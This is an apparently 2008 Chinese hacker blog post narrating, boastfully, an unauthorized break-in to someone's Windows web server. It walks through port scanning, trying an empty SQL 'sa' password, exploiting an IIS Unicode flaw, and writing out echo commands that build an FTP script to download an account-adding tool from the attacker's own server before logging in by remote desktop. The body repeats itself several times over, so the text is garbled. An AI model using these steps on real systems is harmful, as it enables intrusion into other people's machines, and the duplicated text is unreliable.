正文 - 黑站手记：黑个网站怎么这么难

黑站手记：黑个网站怎么这么难
12/31 2008	黑客技术 \| 安全	496 次查看
上一条：王者风范2分钟入侵网站全程实录下一条：no
序言　　如果说黑U漏洞的站有手气背的，大概都比不上我。　　第一章　　找到一台破机器，看着他开了21、80、135、139、1433、3389 　　心想蛮好破的，本来没什么兴趣，先用sql客户端连接，sa空密码试试。。。。　　居然设置了密码，这个网管的智商可能大于40，呵呵，再看看U之类的喽。。。。　　扫描结果显示有U，3389登录上去发现没有输入法漏洞，faint，我还真不知道这service pack怎么能打出这副样子出来，照说打了之后应该没有U漏洞啊。。。。　　随便敲个dir+c:\tftp+/s，等了半天（这机器很烂），居然没有，估计是被尼姆达搞得不行了，才出此烂招，f\\*!!! 　　为了快一点，dir+c:\winnt\system32\ftp.exe，没有！！faint!!! 　　连这个都删？？！！比我还变态。。。真没折了？那我的扫描记录留在那里多危险啊！！　　靠，这么变态的网管，搞他没商量！！！　　想了3秒种，得出了一个结论：　　。。。。。。。。。。　　其实FTP.exe是存在的～～，在哪里呢？　　第二章　　??～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈　　吸取教训，直接整个硬盘查找，慢就慢点吧　　dir c:\ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。　　好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）　　echo xxxxxx >>d 我的帐号，当然也不会告诉你　　echo xxxxxx >>d 我的密码，你认为我会告诉你吗？　　echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦　　echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行　　echo bye >>d 礼貌一点，和我得FTP服务器说byebye 　　OK，　　ftp -s:d 　　等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。　　shit !!!没有传过来，难道我的服务器....???? 　　连接上我的服务器看看，一切正常啊，　　type d ，也很正常啊，怎么回事情？　　ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！　　改写d!!! 　　echo open xxxxx >d 　　echo asdfasdf >>d 　　echo adsfasdf >>d 　　echo user xxxxx >>d 　　echo xxxxx >>d 　　echo bin >>d 　　echo get xxxx >>d 　　echo bye >>d 　　OK 　　ftp -s:d 　　这次好了，原因不明　　连接进去，加帐号，然后3389进去。。。。　　第二章　　??～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈　　吸取教训，直接整个硬盘查找，慢就慢点吧　　dir c:\ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。　　好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）　　echo xxxxxx >>d 我的帐号，当然也不会告诉你　　echo xxxxxx >>d 我的密码，你认为我会告诉你吗？　　echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦　　echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行　　echo bye >>d 礼貌一点，和我得FTP服务器说byebye 　　OK，　　ftp -s:d 　　等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。　　shit !!!没有传过来，难道我的服务器....???? 　　连接上我的服务器看看，一切正常啊，　　type d ，也很正常啊，怎么回事情？　　ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！　　改写d!!! 　　echo open xxxxx >d 　　echo asdfasdf >>d 　　echo adsfasdf >>d 　　echo user xxxxx >>d 　　echo xxxxx >>d 　　echo bin >>d 　　echo get xxxx >>d 　　echo bye >>d 　　OK 　　ftp -s:d 　　这次好了，原因不明　　连接进去，加帐号，然后3389进去。。。。

12/31 2008	黑客技术 \| 安全	496 次查看
上一条：王者风范2分钟入侵网站全程实录下一条：no
序言　　如果说黑U漏洞的站有手气背的，大概都比不上我。　　第一章　　找到一台破机器，看着他开了21、80、135、139、1433、3389 　　心想蛮好破的，本来没什么兴趣，先用sql客户端连接，sa空密码试试。。。。　　居然设置了密码，这个网管的智商可能大于40，呵呵，再看看U之类的喽。。。。　　扫描结果显示有U，3389登录上去发现没有输入法漏洞，faint，我还真不知道这service pack怎么能打出这副样子出来，照说打了之后应该没有U漏洞啊。。。。　　随便敲个dir+c:\tftp+/s，等了半天（这机器很烂），居然没有，估计是被尼姆达搞得不行了，才出此烂招，f\\*!!! 　　为了快一点，dir+c:\winnt\system32\ftp.exe，没有！！faint!!! 　　连这个都删？？！！比我还变态。。。真没折了？那我的扫描记录留在那里多危险啊！！　　靠，这么变态的网管，搞他没商量！！！　　想了3秒种，得出了一个结论：　　。。。。。。。。。。　　其实FTP.exe是存在的～～，在哪里呢？　　第二章　　??～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈　　吸取教训，直接整个硬盘查找，慢就慢点吧　　dir c:\ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。　　好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）　　echo xxxxxx >>d 我的帐号，当然也不会告诉你　　echo xxxxxx >>d 我的密码，你认为我会告诉你吗？　　echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦　　echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行　　echo bye >>d 礼貌一点，和我得FTP服务器说byebye 　　OK，　　ftp -s:d 　　等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。　　shit !!!没有传过来，难道我的服务器....???? 　　连接上我的服务器看看，一切正常啊，　　type d ，也很正常啊，怎么回事情？　　ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！　　改写d!!! 　　echo open xxxxx >d 　　echo asdfasdf >>d 　　echo adsfasdf >>d 　　echo user xxxxx >>d 　　echo xxxxx >>d 　　echo bin >>d 　　echo get xxxx >>d 　　echo bye >>d 　　OK 　　ftp -s:d 　　这次好了，原因不明　　连接进去，加帐号，然后3389进去。。。。　　第二章　　??～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈　　吸取教训，直接整个硬盘查找，慢就慢点吧　　dir c:\ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。　　好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）　　echo xxxxxx >>d 我的帐号，当然也不会告诉你　　echo xxxxxx >>d 我的密码，你认为我会告诉你吗？　　echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦　　echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行　　echo bye >>d 礼貌一点，和我得FTP服务器说byebye 　　OK，　　ftp -s:d 　　等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。　　shit !!!没有传过来，难道我的服务器....???? 　　连接上我的服务器看看，一切正常啊，　　type d ，也很正常啊，怎么回事情？　　ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！　　改写d!!! 　　echo open xxxxx >d 　　echo asdfasdf >>d 　　echo adsfasdf >>d 　　echo user xxxxx >>d 　　echo xxxxx >>d 　　echo bin >>d 　　echo get xxxx >>d 　　echo bye >>d 　　OK 　　ftp -s:d 　　这次好了，原因不明　　连接进去，加帐号，然后3389进去。。。。

友情链接